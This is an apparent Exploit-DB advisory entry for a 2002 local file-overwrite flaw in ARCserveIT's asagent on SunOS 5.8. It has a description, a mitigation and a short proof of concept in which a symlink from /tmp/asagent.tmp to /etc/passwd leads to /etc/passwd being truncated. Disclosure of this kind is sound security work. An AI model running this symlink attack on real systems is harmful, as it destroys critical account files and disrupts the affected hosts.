ARCservIT from Computer Associates contains a vulnerability

vendor:

ARCserveIT

by:

SecurityFocus

7.2

CVSS

HIGH

Local File Overwrite

264

CWE

Product Name: ARCserveIT

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: SunOS 5.8

2002

ARCservIT from Computer Associates contains a vulnerability

When it runs for the first time, 'asagent', opens (and truncates it if it exists) a file in /tmp called 'asagent.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file. This may allow malicious local users to overwrite critical system files.

Mitigation:

Ensure that the 'asagent' process is not running with elevated privileges and that the /tmp directory is not writable by malicious users.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2741/info

ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to overwrite arbitrary files.

When it runs for the first time, 'asagent', opens (and truncates it if it exists) a file in /tmp called 'asagent.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.

This may allow malicious local users to overwrite critical system files. 

As user:

je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp

And root:

root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u

ARCserveIT Universal Agent started...

Then,

je@boxname~> ls -la /etc/passwd
-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd